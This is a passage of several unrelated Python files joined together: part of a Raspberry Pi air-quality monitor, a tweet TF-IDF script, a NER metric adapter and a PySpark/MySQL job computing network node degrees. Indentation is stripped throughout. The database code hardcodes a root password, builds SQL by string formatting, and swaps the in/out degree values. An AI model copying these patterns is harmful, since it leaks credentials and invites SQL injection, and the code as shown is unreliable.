bme680_burn_data.append(gas_burn)
if len(bme680_burn_data) > 60: bme680_burn_data = bme680_burn_data[-60:]
else: pass
# print("*** BME680 *** gas {0:.2f} Ohms ***".format(gas_burn))
time.sleep(1)
else:
self.burn_in_mode = 0
print("*** BME680 not ready ...")
else:
self.bme680_gas_baseline = sum(bme680_burn_data[-60:]) / 60.0
self.burn_in_mode = 2
del gas_burn
del bme680_burn_data[:]
del bme680_burn_data
bme680_burn_data = {"bme680": []}
# print("\n*** BME680 baseline *** gas {0:.2f} Ohms *** humidity {1:.2f} %RH ***".format(self.bme680_gas_baseline, self.bme680_humidity_baseline))
__bme680_sense()
__bme680_burn_in()
def fn_sgp30(self):
# self.sgp30.command('set_baseline', (0xFECA, 0xBEBA)) # (0x8973, 0x8AAE)
self.sgp30.start_measurement()
command_time_1 = command_time_2 = 0
# sgp30_baseline = []
# print(["*** SGP30 *** old baseline {:02x} ***".format(n) for n in self.sgp30.command('get_baseline')])
while True:
data_sgp30 = self.sgp30.get_air_quality()
self.data_sgp30_equivalent_co2 = data_sgp30.equivalent_co2
self.data_sgp30_total_voc = data_sgp30.total_voc
# print("*** SGP30 *** eCO2 {0} ppm *** TVOC *** {1} ppb ***".format(self.data_sgp30_equivalent_co2, self.data_sgp30_total_voc))
command_time_1 += 1
command_time_2 += 1
if command_time_1 == 360: # 1 ORA = 3600
# sgp30_baseline = self.sgp30.command('get_baseline') # CO2, TVOC
# self.sgp30.command('set_baseline', (sgp30_baseline[1], sgp30_baseline[0])) # TVOC, CO2 REVERSE ORDER
# print(["*** SGP30 *** new baseline {:02x} ***".format(n) for n in self.sgp30.command('get_baseline')])
command_time_1 = 0
else: pass
if command_time_2 == 180:
if self.bme680_humidity > 0 and self.bme680_temperature > 0:
hum = self.bme680_humidity
temp = self.bme680_temperature
absolute_hum = int(1000 * 216.7 * (hum / 100 * 6.112 * math.exp(17.62 * temp / (243.12 + temp))) / (273.15 + temp))
self.sgp30.command('set_humidity', [absolute_hum])
print("*** SGP30 *** set humidity ...")
else: pass
command_time_2 = 0
else: pass
time.sleep(1)
def fn_current_value(self, element_arg_1 = "", element_arg_2 = 0, element_arg_3 = ""):
''' message_1 = "{}".format(element_arg_1) # element_arg_1[:5]
message_2 = "{}".format(element_arg_2)
message_3 = "{}".format(element_arg_3) '''
print(f"*** {element_arg_1} {element_arg_2} {element_arg_3} ***")
range_limits = self.the_elements_range[self.button_mode]
range_limits_len = len(range_limits)
self.the_rgb = self.the_elements_palette_1[self.button_mode][0]
self.led_brightness_2 = self.led_brightness_1[self.button_mode][0]
for j in range(range_limits_len):
if int(element_arg_2) > range_limits[j]:
self.the_rgb = self.the_elements_palette_1[self.button_mode][j + 1]
self.led_brightness_2 = self.led_brightness_1[self.button_mode][j + 1]
else: pass
def fn_led_1(self):
led_rgb_2 = [0, 0, 0]
def __next_colour(the_rgb):
self.led_act = 1
while len(self.the_rgb) == 2 and led_rgb_2[0] != the_rgb[0] or led_rgb_2[1] != the_rgb[1] or led_rgb_2[2] != the_rgb[2]:
if led_rgb_2[0] > the_rgb[0]: led_rgb_2[0] -= 1
elif led_rgb_2[0] < the_rgb[0]: led_rgb_2[0] += 1
else: pass
if led_rgb_2[1] > the_rgb[1]: led_rgb_2[1] -= 1
elif led_rgb_2[1] < the_rgb[1]: led_rgb_2[1] += 1
else: pass
if led_rgb_2[2] > the_rgb[2]: led_rgb_2[2] -= 1
elif led_rgb_2[2] < the_rgb[2]: led_rgb_2[2] += 1
else: pass
self.unicornhatmini.set_all(led_rgb_2[0], led_rgb_2[1], led_rgb_2[2])
self.unicornhatmini.show()
self.led_act = 0
led_cur_width = led_brightness_3 = 0
led_rgb = [0, 0, 0]
i = 0.00
load_line = int(self.bme680_burn_in_time / 17) + 1
for x in range(0, 17):
for y in range(0, 7):
self.unicornhatmini.set_pixel(x, y, 255, 255, 255)
if self.burn_in_mode == 0:
while self.burn_in_mode == 0: pass
else: pass
elif self.burn_in_mode == 2: load_line = 0.5
else: pass
self.unicornhatmini.show()
print("*** ", 17 - x)
time.sleep(load_line) # time.sleep(0.5 / 17)
self.unicornhatmini.clear()
while True:
if len(self.the_rgb) == 3:
while len(self.the_rgb) == 3 and i <= 10: # for i in range(0, 10, 1):
i += 0.50
if led_rgb == self.the_rgb and led_brightness_3 == self.led_brightness_2:
if led_brightness_3 == 0: led_cur_width = 0.2
elif 0.09 <= led_brightness_3 <= 0.15: led_cur_width = i / 10.0
else: led_cur_width = i / 30.0
self.unicornhatmini.set_brightness(led_cur_width)
self.unicornhatmini.set_all(led_rgb[0], led_rgb[1], led_rgb[2])
self.unicornhatmini.show()
time.sleep(led_brightness_3)
else:
# buttonshim.set_pixel(0, 0, 0)
# buttonshim.set_brightness(0)
led_rgb = self.the_rgb
led_brightness_3 = self.led_brightness_2
break
else:
while len(self.the_rgb) == 3 and i >= 1: # for i in range(10, 0, -1):
i -= 0.50
if led_brightness_3 == 0: led_cur_width = 0.2
elif 0.09 <= led_brightness_3 <= 0.15: led_cur_width = i / 10.0
else: led_cur_width = i / 30.0
self.unicornhatmini.set_brightness(led_cur_width)
self.unicornhatmini.set_all(led_rgb[0], led_rgb[1], led_rgb[2])
self.unicornhatmini.show()
time.sleep(led_brightness_3)
else: pass
elif len(self.the_rgb) == 2:
print("****** fn_led_1 ELSE")
for c_1 in range(0, 2, 1):
if len(self.the_rgb) == 2 and self.led_act == 0:
__next_colour((self.the_rgb[c_1][0], self.the_rgb[c_1][1], self.the_rgb[c_1][2]))
else: pass
for c_2 in reversed(range(0, 2, 1)):
if len(self.the_rgb) == 2 and self.led_act == 0:
__next_colour((self.the_rgb[c_2][0], self.the_rgb[c_2][1], self.the_rgb[c_2][2]))
else: pass
else: pass
def fn_button_pressed(self):
while True:
if self.burn_in_mode == 2:
if self.button_a.is_pressed:
self.button_a.wait_for_release(timeout = 1)
self.press_act = 1
self.button_mode -= 1
elif self.button_b.is_pressed:
self.button_b.wait_for_release(timeout = 1)
self.press_act = 1
self.button_mode += 1
elif self.button_x.is_pressed:
self.button_x.wait_for_release(timeout = 1)
self.press_act = 0
self.unicornhatmini.set_brightness(0)
self.unicornhatmini.clear()
self.the_rgb = (0, 0, 0)
elif self.button_y.is_pressed:
self.button_y.wait_for_release(timeout = 1)
self.press_act = 0
self.unicornhatmini.set_brightness(0)
self.unicornhatmini.clear()
self.the_rgb = (0, 0, 0)
call("sudo shutdown -P -t 0.3", shell=True) # call("sudo shutdown -P -t 1", shell=True)
sys.exit(0)
else: pass
self.button_mode %= len(self.the_elements)
else:
self.press_act = 1
self.button_mode = 0
if self.button_mode == 0 and self.press_act == 1: self.fn_current_value(str("{0:02d}".format(self.rtc_now.day) + "." + "{0:02d}".format(self.rtc_now.month) + "." + "{0:02d}".format(self.rtc_now.year)[-2:]), int("{0:02d}".format(self.rtc_now.hour) + "{0:02d}".format(self.rtc_now.minute)), "")
elif self.button_mode == 1 and self.press_act == 1: self.fn_current_value("TEMP", int(self.bme680_temperature), "C") # self.fn_current_value("TEMP", round(self.bme680_temperature, 1), "C")
elif self.button_mode == 2 and self.press_act == 1: self.fn_current_value("RH", int(self.bme680_humidity), "%")
elif self.button_mode == 3 and self.press_act == 1: self.fn_current_value("eCO2", int(self.data_sgp30_equivalent_co2), "ppm")
elif self.button_mode == 4 and self.press_act == 1: self.fn_current_value("TVOC", int(self.data_sgp30_total_voc), "ppb")
elif self.button_mode == 5 and self.press_act == 1: self.fn_current_value("VOC IAQ", int(self.bme680_aqs), "%")
else: pass
time.sleep(0.1)
def fn_thread_go(self): # non-random ordering
t0 = Thread(target = self.fn_rv3028)
t0.setDaemon(True)
t0.start()
t1 = Thread(target = self.fn_bme680)
t1.setDaemon(True)
t1.start()
t2 = Thread(target = self.fn_sgp30)
t2.setDaemon(True)
t2.start()
t3 = Thread(target = self.fn_led_1)
t3.setDaemon(True)
t3.start()
t4 = Thread(target = self.fn_button_pressed)
t4.setDaemon(False) # BUTTON FN NO DAEMON!
t4.start()
if __name__ == "__main__":
try: DIYzenIAQ()
except (KeyboardInterrupt, SystemExit):
sys.exit(0)
except Exception as e:
print("*** ERROR: {0} ***".format(str(e)))
print("*** RELOAD ...")
os.execl(sys.executable, "python3", __file__, *sys.argv[1:])
sys.exit(0)
|
from signews.vectorizer import TFIDF
from signews.database import Tweet
def calculate_idf():
# Obtain all tweets
tweet_objects = Tweet.select(Tweet.body)
tweets = [tweet.body for tweet in tweet_objects]
tf_idf_vectorizer = TFIDF()
tf_idf_vectorizer.calculate_idf(tweets)
# Store the word and it's IDF value in a file
tf_idf_vectorizer.save_word_idf()
if __name__ == "__main__":
calculate_idf()
|
#!/usr/bin/env python 3
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020 PanXu, Inc. All Rights Reserved
#
"""
ner metric
Authors: PanXu
Date: 2020/06/27 20:48:00
"""
from typing import Tuple, Dict, Union, List
from torch import Tensor
from torch.distributed import ReduceOp
from easytext.metrics import ModelMetricAdapter, ModelTargetMetric
from easytext.metrics import SpanF1Metric
from easytext.label_decoder import ModelLabelDecoder
from easytext.component.register import ComponentRegister
from ner.data.vocabulary_builder import VocabularyBuilder
from ner.models import NerModelOutputs
@ComponentRegister.register(name_space="ner")
class NerModelMetricAdapter(ModelMetricAdapter):
"""
Ner Model Metric Adapter
计算 Ner Model Metric
"""
def __init__(self,
vocabulary_builder: VocabularyBuilder,
model_label_decoder: ModelLabelDecoder):
self.span_f1_metric = SpanF1Metric(vocabulary_builder.label_vocabulary)
self.model_label_decoder = model_label_decoder
def __call__(self, model_outputs: NerModelOutputs, golden_labels: Tensor) -> Tuple[Dict, ModelTargetMetric]:
model_outputs: NerModelOutputs = model_outputs
prediction_labels = self.model_label_decoder.decode_label_index(model_outputs=model_outputs)
metric_dict = self.span_f1_metric(prediction_labels=prediction_labels,
gold_labels=golden_labels,
mask=model_outputs.mask)
target_metric = ModelTargetMetric(metric_name=SpanF1Metric.F1_OVERALL,
metric_value=metric_dict[SpanF1Metric.F1_OVERALL])
return metric_dict, target_metric
@property
def metric(self) -> Tuple[Dict, ModelTargetMetric]:
target_metric = ModelTargetMetric(metric_name=SpanF1Metric.F1_OVERALL,
metric_value=self.span_f1_metric.metric[SpanF1Metric.F1_OVERALL])
return self.span_f1_metric.metric, target_metric
def reset(self) -> "NerModelMetricAdapter":
self.span_f1_metric.reset()
return self
def to_synchronized_data(self) -> Tuple[Union[Dict[Union[str, int], Tensor], List[Tensor], Tensor], ReduceOp]:
return self.span_f1_metric.to_synchronized_data()
def from_synchronized_data(self, sync_data: Union[Dict[Union[str, int], Tensor], List[Tensor], Tensor],
reduce_op: ReduceOp) -> None:
self.span_f1_metric.from_synchronized_data(sync_data=sync_data, reduce_op=reduce_op)
|
# -*- coding: utf-8 -*-
# !/usr/bin/python
################################### PART0 DESCRIPTION #################################
# Filename: class_read_csv_input_data_save_word_to_database.py
# Description:
#
# Author: Shuai Yuan
# E-mail: ysh329@sina.com
# Create: 2015-12-06 15:22:38
# Last:
__author__ = 'yuens'
################################### PART1 IMPORT ######################################
import logging
import MySQLdb
import time
from operator import add
import networkx as nx
################################### PART2 CLASS && FUNCTION ###########################
class ComputeNodeProperty(object):
def __init__(self, database_name, pyspark_sc):
self.start = time.clock()
logging.basicConfig(level = logging.INFO,
format = '%(asctime)s %(levelname)5s %(filename)19s[line:%(lineno)3d] %(funcName)s %(message)s',
datefmt = '%y-%m-%d %H:%M:%S',
filename = './main.log',
filemode = 'a')
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(levelname)5s %(filename)19s[line:%(lineno)3d] %(funcName)s %(message)s')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
logging.info("START CLASS {class_name}.".format(class_name = ComputeNodeProperty.__name__))
# connect database
try:
self.con = MySQLdb.connect(host='localhost', user='root', passwd='931209', db = database_name, charset='utf8')
logging.info("Success in connecting MySQL.")
except MySQLdb.Error, e:
logging.error("Fail in connecting MySQL.")
logging.error("MySQL Error {error_num}: {error_info}.".format(error_num = e.args[0], error_info = e.args[1]))
# spark configure
try:
self.sc = pyspark_sc
logging.info("Config spark successfully.")
except Exception as e:
logging.error("Config spark failed.")
logging.error(e)
def __del__(self):
# close database
try:
self.con.close()
logging.info("Success in quiting MySQL.")
except MySQLdb.Error, e:
logging.error("MySQL Error {error_num}: {error_info}.".format(error_num = e.args[0], error_info = e.args[1]))
logging.info("END CLASS {class_name}.".format(class_name = ComputeNodeProperty.__name__))
self.end = time.clock()
logging.info("The class {class_name} run time is : {delta_time} seconds".format(class_name = ComputeNodeProperty.__name__, delta_time = self.end))
def read_connection_data_in_database(self, database_name, connection_table_name):
cursor = self.con.cursor()
sqls = []
sqls.append("""USE {0}""".format(database_name))
sqls.append("""SELECT network_type, is_directed, connection_id, node1, node2 FROM {database}.{table}"""\
.format(database = database_name, table = connection_table_name)\
)
for sql_idx in xrange(len(sqls)):
sql = sqls[sql_idx]
try:
cursor.execute(sql)
if sql_idx == len(sqls)-1:
connection_data_2d_tuple = cursor.fetchall()
logging.info("len(connection_data_2d_tuple):{0}".format(len(connection_data_2d_tuple)))
logging.info("type(connection_data_2d_tuple):{0}".format(type(connection_data_2d_tuple)))
logging.info("connection_data_2d_tuple[:10]:{0}".format(connection_data_2d_tuple[:10]))
logging.info("type(connection_data_2d_tuple[0]):{0}".format(type(connection_data_2d_tuple[0])))
except MySQLdb.Error, e:
self.con.rollback()
logging.error("Fail in attaining connection data from {database_name}.{table_name}.".format(database_name = database_name, table_name = connection_table_name))
logging.error("MySQL Error {error_num}: {error_info}.".format(error_num = e.args[0], error_info = e.args[1]))
return 0
cursor.close()
# transform to rdd
connection_data_tuple_rdd = self.sc.parallelize(connection_data_2d_tuple)\
.map(lambda (network_type, is_directed, connection_id, node1, node2):\
(network_type.encode("utf8"),\
int(is_directed),\
int(connection_id),\
int(node1),\
int(node2))\
)
logging.info("connection_data_tuple_rdd.count():{0}".format(connection_data_tuple_rdd.count()))
logging.info("connection_data_tuple_rdd.take(3):{0}".format(connection_data_tuple_rdd.take(3)))
# transform to six different rdd
## bio network
bio_directed_tuple_rdd = connection_data_tuple_rdd.filter(lambda (network_type, is_directed, connection_id, node1, node2): network_type == "bio" and is_directed == 1)
logging.info("bio_directed_tuple_rdd.count():{0}".format(bio_directed_tuple_rdd.count()))
logging.info("bio_directed_tuple_rdd.take(3):{0}".format(bio_directed_tuple_rdd.take(3)))
bio_undirected_tuple_rdd = connection_data_tuple_rdd.filter(lambda (network_type, is_directed, connection_id, node1, node2): network_type == "bio" and is_directed == 0)
logging.info("bio_undirected_tuple_rdd.count():{0}".format(bio_undirected_tuple_rdd.count()))
logging.info("bio_undirected_tuple_rdd.take(3):{0}".format(bio_undirected_tuple_rdd.take(3)))
# info network
info_directed_tuple_rdd = connection_data_tuple_rdd.filter(lambda (network_type, is_directed, connection_id, node1, node2): network_type == "info" and is_directed == 1)
logging.info("info_directed_tuple_rdd.count():{0}".format(info_directed_tuple_rdd.count()))
logging.info("info_directed_tuple_rdd.take(3):{0}".format(info_directed_tuple_rdd.take(3)))
info_undirected_tuple_rdd = connection_data_tuple_rdd.filter(lambda (network_type, is_directed, connection_id, node1, node2): network_type == "info" and is_directed == 0)
logging.info("info_undirected_tuple_rdd.count():{0}".format(info_undirected_tuple_rdd.count()))
logging.info("info_undirected_tuple_rdd.take(3):{0}".format(info_undirected_tuple_rdd.take(3)))
# social network
social_directed_tuple_rdd = connection_data_tuple_rdd.filter(lambda (network_type, is_directed, connection_id, node1, node2): network_type == "social" and is_directed == 1)
logging.info("social_directed_tuple_rdd.count():{0}".format(social_directed_tuple_rdd.count()))
logging.info("social_directed_tuple_rdd.take(3):{0}".format(social_directed_tuple_rdd.take(3)))
social_undirected_tuple_rdd = connection_data_tuple_rdd.filter(lambda (network_type, is_directed, connection_id, node1, node2): network_type == "social" and is_directed == 0)
logging.info("social_undirected_tuple_rdd.take(3):{0}".format(social_undirected_tuple_rdd.count()))
logging.info("social_undirected_tuple_rdd.take(3):{0}".format(social_undirected_tuple_rdd.take(3)))
network_rdd_list = [bio_directed_tuple_rdd, bio_undirected_tuple_rdd,\
info_directed_tuple_rdd, info_undirected_tuple_rdd,\
social_directed_tuple_rdd, social_undirected_tuple_rdd]
return network_rdd_list
def compute_degree_in_different_network(self, network_rdd_list):
# sub-function
def compute_degree_in_undirected_network(network_data_tuple_rdd):
try:
node_and_degree_tuple_rdd = network_data_tuple_rdd\
.map(lambda (network_type, is_directed, connection_id, node1, node2): (node1, node2))\
.flatMap(lambda node_tuple: [node_tuple[0], node_tuple[1]])\
.map(lambda node: (node, 1))\
.reduceByKey(add)\
.sortBy(lambda (node, degree): degree, False)
logging.info("node_and_degree_tuple_rdd.count():{0}".format(node_and_degree_tuple_rdd.count()))
logging.info("node_and_degree_tuple_rdd.take(3):{0}".format(node_and_degree_tuple_rdd.take(3)))
except Exception as e:
logging.error(e)
return None
return node_and_degree_tuple_rdd
# sub-function
def compute_degree_in_directed_network(network_data_tuple_rdd):
try:
node_tuple_rdd = network_data_tuple_rdd\
.map(lambda (network_type, is_directed, connection_id, node1, node2): (node1, node2))
logging.info("node_tuple_rdd.count():{0}".format(node_tuple_rdd.count()))
logging.info("node_tuple_rdd.take(3):{0}".format(node_tuple_rdd.take(3)))
node_and_in_degree_rdd = node_tuple_rdd\
.map(lambda (node_in, node_out): (node_in, 1))\
.reduceByKey(add)
logging.info("node_and_in_degree_rdd.count():{0}".format(node_and_in_degree_rdd.count()))
logging.info("node_and_in_degree_rdd.take(3):{0}".format(node_and_in_degree_rdd.take(3)))
node_and_out_degree_rdd = node_tuple_rdd\
.map(lambda (node_in, node_out): (node_out, 1))\
.reduceByKey(add)
logging.info("node_and_out_degree_rdd.count():{0}".format(node_and_out_degree_rdd.count()))
logging.info("node_and_out_degree_rdd.take(3):{0}".format(node_and_out_degree_rdd.take(3)))
node_and_in_and_out_degree_tuple_rdd = node_and_in_degree_rdd\
.fullOuterJoin(node_and_out_degree_rdd)\
.map(lambda (node, (in_degree, out_degree)): (node, 0 if in_degree == None else in_degree, 0 if out_degree == None else out_degree))\
.sortBy(lambda (node, in_degree, out_degree): out_degree, False)
logging.info("node_and_in_and_out_degree_tuple_rdd.count():{0}".format(node_and_in_and_out_degree_tuple_rdd.count()))
logging.info("node_and_in_and_out_degree_tuple_rdd.take(3):{0}".format(node_and_in_and_out_degree_tuple_rdd.take(3)))
except Exception as e:
logging.error("Compute degree failed in directed network.")
logging.error(e)
return None
return node_and_in_and_out_degree_tuple_rdd
# sub-function
def compute_node_num_in_network(network_data_tuple_rdd):
try:
if network_data_tuple_rdd.take(1)[0][1] == 1: # directed
node_and_in_and_out_degree_tuple_rdd = compute_degree_in_directed_network(network_data_tuple_rdd)
node_num_in_network = node_and_in_and_out_degree_tuple_rdd.count()
return node_num_in_network, node_and_in_and_out_degree_tuple_rdd
else: # undirected
node_and_degree_tuple_rdd = compute_degree_in_undirected_network(network_data_tuple_rdd)
node_num_in_network = node_and_degree_tuple_rdd.count()
return node_num_in_network, node_and_degree_tuple_rdd
except Exception as e:
logging.error("Compute node number failed in network.")
logging.error(e)
return None
# sub-function
def compute_normalized_degree_in_network(network_data_tuple_rdd):
try:
#print "network_data_tuple_rdd.take(1):{0}".format(network_data_tuple_rdd.take(1))
if network_data_tuple_rdd.take(1)[0][1] == 1: # directed
node_num_in_network, node_and_in_and_out_degree_tuple_rdd = compute_node_num_in_network(network_data_tuple_rdd)
logging.info("node_num_in_network:{0}".format(node_num_in_network))
logging.info("node_and_in_and_out_degree_tuple_rdd.take(3):{0}".format(node_and_in_and_out_degree_tuple_rdd.take(3)))
node_data_tuple_rdd = node_and_in_and_out_degree_tuple_rdd\
.map(lambda (node, in_degree, out_degree):(node,\
(in_degree+out_degree,\
in_degree,\
out_degree,\
float(in_degree)/(in_degree+out_degree) if (in_degree+out_degree) != 0 else 0.0,\
float(out_degree)/node_num_in_network\
)\
)\
)\
.sortBy(lambda (node, (degree, in_degree, out_degree, in_degree_rate, normalized_degree)): normalized_degree, False)\
.fullOuterJoin(compute_degree_str_in_network(network_data_tuple_rdd))\
.map(lambda (node,\
((degree, in_degree, out_degree, in_degree_rate, normalized_degree),\
(all_degree_str, in_degree_str, out_degree_str)\
)\
): (node,\
all_degree_str,\
degree,\
in_degree_str,\
in_degree,\
out_degree_str,\
out_degree,\
in_degree_rate,\
normalized_degree\
)\
)
logging.info("node_data_tuple_rdd.take(3):{0}".format(node_data_tuple_rdd.take(3)))
else: # undirected
node_num_in_network, node_and_degree_tuple_rdd = compute_node_num_in_network(network_data_tuple_rdd)
logging.info("node_num_in_network:{0}".format(node_num_in_network))
logging.info("node_and_degree_tuple_rdd.take(3):{0}".format(node_and_degree_tuple_rdd.take(3)))
node_data_tuple_rdd = node_and_degree_tuple_rdd\
.map(lambda (node, degree): (node, (degree, 0, 0, 0.0, float(degree) / node_num_in_network) ) )\
.sortBy(lambda (node, (degree, in_degree, out_degree, in_degree_rate, normalized_degree)): normalized_degree, False)\
.fullOuterJoin(compute_degree_str_in_network(network_data_tuple_rdd))\
.map(lambda (node,\
((degree, in_degree, out_degree, in_degree_rate, normalized_degree),\
(all_degree_str, in_degree_str, out_degree_str)\
)\
): (node,\
all_degree_str,\
degree,\
in_degree_str,\
in_degree,\
out_degree_str,\
out_degree,\
in_degree_rate,\
normalized_degree\
)\
)
logging.info("node_data_tuple_rdd.take(3):{0}".format(node_data_tuple_rdd.take(3)))
except Exception as e:
logging.error("Compute normalized degree failed in network.")
logging.error(e)
return None
return node_data_tuple_rdd
# sub-function
def compute_degree_str_in_network(network_data_tuple_rdd):
try:
# WHATEVER directed or !directed
node1_and_node2_tuple_rdd = network_data_tuple_rdd\
.map(lambda (network_type, is_directed, connection_id, node1, node2): (node1, node2))
node_and_in_degree_str_tuple_rdd = node1_and_node2_tuple_rdd\
.map(lambda (node1, node2): (node2, node1))\
.reduceByKey(lambda in_node1, in_node2: str(in_node1)+"///"+str(in_node2))\
.map(lambda (node, in_degree_str): (node, str(in_degree_str)))
#logging.info("node_and_in_degree_str_tuple_rdd.take(3):{0}".format(node_and_in_degree_str_tuple_rdd.take(3)))
node_and_out_degree_str_tuple_rdd = node1_and_node2_tuple_rdd\
.map(lambda (node1, node2): (node1, node2))\
.reduceByKey(lambda out_node1, out_node2: str(out_node1)+"///"+str(out_node2))\
.map(lambda (node, in_degree_str): (node, str(in_degree_str)))
#logging.info("node_and_out_degree_str_tuple_rdd.take(3):{0}".format(node_and_out_degree_str_tuple_rdd.take(3)))
node_and_in_and_out_degree_str_tuple_rdd = node_and_in_degree_str_tuple_rdd\
.fullOuterJoin(node_and_out_degree_str_tuple_rdd)\
.map(lambda (node, (in_degree_str, out_degree_str)): (node,\
"" if in_degree_str == None else in_degree_str,\
"" if out_degree_str == None else out_degree_str\
)\
)
node_and_all_and_in_and_out_degree_str_tuple_rdd = node_and_in_and_out_degree_str_tuple_rdd\
.map(lambda (node, in_degree_str, out_degree_str): (node,\
("///".join([i for i in set(in_degree_str.split("///")+out_degree_str.split("///")) if i!=""]),\
in_degree_str,\
out_degree_str\
)\
)\
)
except Exception as e:
logging.error("failed to compute degree string in network.")
logging.error(e)
return None
return node_and_all_and_in_and_out_degree_str_tuple_rdd
bio_directed_tuple_rdd, bio_undirected_tuple_rdd = network_rdd_list[0], network_rdd_list[1]
info_directed_tuple_rdd, info_undirected_tuple_rdd = network_rdd_list[2], network_rdd_list[3]
social_directed_tuple_rdd, social_undirected_tuple_rdd = network_rdd_list[4], network_rdd_list[5]
# (node, degree, in_degree, out_degree, in_degree_rate, normalized_degree)
bio_directed_node_data_tuple_rdd = compute_normalized_degree_in_network(network_data_tuple_rdd = bio_directed_tuple_rdd)
bio_undirected_node_data_tuple_rdd = compute_normalized_degree_in_network(network_data_tuple_rdd = bio_undirected_tuple_rdd)
info_directed_node_data_tuple_rdd = compute_normalized_degree_in_network(network_data_tuple_rdd = info_directed_tuple_rdd)
info_undirected_node_data_tuple_rdd = compute_normalized_degree_in_network(network_data_tuple_rdd = info_undirected_tuple_rdd)
social_directed_node_data_tuple_rdd = compute_normalized_degree_in_network(network_data_tuple_rdd = social_directed_tuple_rdd)
social_undirected_node_data_tuple_rdd = compute_normalized_degree_in_network(network_data_tuple_rdd = social_undirected_tuple_rdd)
# Merge them into one list
node_data_rdd_list = [bio_directed_node_data_tuple_rdd, bio_undirected_node_data_tuple_rdd,\
info_directed_node_data_tuple_rdd, info_undirected_node_data_tuple_rdd,\
social_directed_node_data_tuple_rdd, social_undirected_node_data_tuple_rdd]
return node_data_rdd_list
def save_node_data_rdd_list_to_database(self, database_name, node_table_name, node_data_rdd_list):
# sub-function
# (node, all_degree_str, degree_num, in_degree_str, in_degree_num,
# out_degree_str, out_degree_num, in_degree_rate, normalized_degree)
def sql_generator(database_name, node_table_name, network_type, is_directed, node_data_tuple):
node = node_data_tuple[0]
degree_str = node_data_tuple[1]
degree_num = node_data_tuple[2]
in_degree_str = node_data_tuple[3]
in_degree_num = node_data_tuple[4]
out_degree_str = node_data_tuple[5]
out_degree_num = node_data_tuple[6]
in_degree_rate = float(out_degree_num)/(in_degree_num+out_degree_num) if out_degree_num != 0 else 0#node_data_tuple[7]
normalized_degree = node_data_tuple[8]
try:
sql = """INSERT INTO {database_name}.{table_name}(node, network_type, is_directed, degree_str, degree_num,
in_degree_str, in_degree_num,
out_degree_str, out_degree_num,
in_degree_rate, normalized_degree)
VALUES({node}, '{network_type}', {is_directed}, '{degree_str}', {degree_num},
'{in_degree_str}', {in_degree_num},
'{out_degree_str}', {out_degree_num},
{in_degree_rate}, {normalized_degree})"""\
.format(database_name = database_name,\
table_name = node_table_name,\
node = node, network_type = network_type, is_directed = is_directed,\
degree_str = degree_str, degree_num = degree_num,\
in_degree_str = in_degree_str, in_degree_num = out_degree_num,\
out_degree_str = out_degree_str, out_degree_num = in_degree_num,\
in_degree_rate = in_degree_rate, normalized_degree = normalized_degree\
)
except Exception as e:
logging.error("failed to generate sql.")
logging.error(e)
return sql
bio_directed_node_data_tuple_rdd, bio_undirected_node_data_tuple_rdd = node_data_rdd_list[0], node_data_rdd_list[1]
info_directed_node_data_tuple_rdd, info_undirected_node_data_tuple_rdd = node_data_rdd_list[2], node_data_rdd_list[3]
social_directed_node_data_tuple_rdd, social_undirected_node_data_tuple_rdd = node_data_rdd_list[4], node_data_rdd_list[5]
# generate sql from rdd
# bio
bio_directed_node_sql_rdd = bio_directed_node_data_tuple_rdd\
.map(lambda node_data_tuple: sql_generator(database_name = database_name,\
node_table_name = node_table_name,\
network_type = "bio",\
is_directed = 1,\
node_data_tuple = node_data_tuple\
)\
)
logging.info("bio_directed_node_sql_rdd.persist().is_cached:{0}".format(bio_directed_node_sql_rdd.persist().is_cached))
logging.info("bio_directed_node_sql_rdd.count():{0}".format(bio_directed_node_sql_rdd.count()))
logging.info("bio_directed_node_sql_rdd.take(3):{0}".format(bio_directed_node_sql_rdd.take(3)))
bio_undirected_node_sql_rdd = bio_undirected_node_data_tuple_rdd\
.map(lambda node_data_tuple: sql_generator(database_name = database_name,\
node_table_name = node_table_name,\
network_type = "bio",\
is_directed = 0,\
node_data_tuple = node_data_tuple\
)\
)
logging.info("bio_undirected_node_sql_rdd.persist().is_cached:{0}".format(bio_undirected_node_sql_rdd.persist().is_cached))
logging.info("bio_undirected_node_sql_rdd.count():{0}".format(bio_undirected_node_sql_rdd.count()))
logging.info("bio_undirected_node_sql_rdd.take(3):{0}".format(bio_undirected_node_sql_rdd.take(3)))
# info
info_directed_node_sql_rdd = info_directed_node_data_tuple_rdd\
.map(lambda node_data_tuple: sql_generator(database_name = database_name,\
node_table_name = node_table_name,\
network_type = "info",\
is_directed = 1,\
node_data_tuple = node_data_tuple\
)\
)
logging.info("info_directed_node_sql_rdd.persist().is_cached:{0}".format(info_directed_node_sql_rdd.persist().is_cached))
logging.info("info_directed_node_sql_rdd.count():{0}".format(info_directed_node_sql_rdd.count()))
logging.info("info_directed_node_sql_rdd.take(3):{0}".format(info_directed_node_sql_rdd.take(3)))
info_undirected_node_sql_rdd = info_undirected_node_data_tuple_rdd\
.map(lambda node_data_tuple: sql_generator(database_name = database_name,\
node_table_name = node_table_name,\
network_type = "info",\
is_directed = 0,\
node_data_tuple = node_data_tuple\
)\
)
logging.info("info_undirected_node_sql_rdd.persist().is_cached:{0}".format(info_undirected_node_sql_rdd.persist().is_cached))
logging.info("info_undirected_node_sql_rdd.count():{0}".format(info_undirected_node_sql_rdd.count()))
logging.info("info_undirected_node_sql_rdd.take(3):{0}".format(info_undirected_node_sql_rdd.take(3)))
# social
social_directed_node_sql_rdd = social_directed_node_data_tuple_rdd\
.map(lambda node_data_tuple: sql_generator(database_name = database_name,\
node_table_name = node_table_name,\
network_type = "social",\
is_directed = 1,\
node_data_tuple = node_data_tuple\
)\
)
logging.info("social_directed_node_sql_rdd.persist().is_cached:{0}".format(social_directed_node_sql_rdd.persist().is_cached))
logging.info("social_directed_node_sql_rdd.count():{0}".format(social_directed_node_sql_rdd.count()))
logging.info("social_directed_node_sql_rdd.take(3):{0}".format(social_directed_node_sql_rdd.take(3)))
social_undirected_node_sql_rdd = social_undirected_node_data_tuple_rdd\
.map(lambda node_data_tuple: sql_generator(database_name = database_name,\
node_table_name = node_table_name,\
network_type = "social",\
is_directed = 0,\
node_data_tuple = node_data_tuple\
)\
)
logging.info("social_undirected_node_sql_rdd.persist().is_cached:{0}".format(social_undirected_node_sql_rdd.persist().is_cached))
logging.info("social_undirected_node_sql_rdd.count():{0}".format(social_undirected_node_sql_rdd.count()))
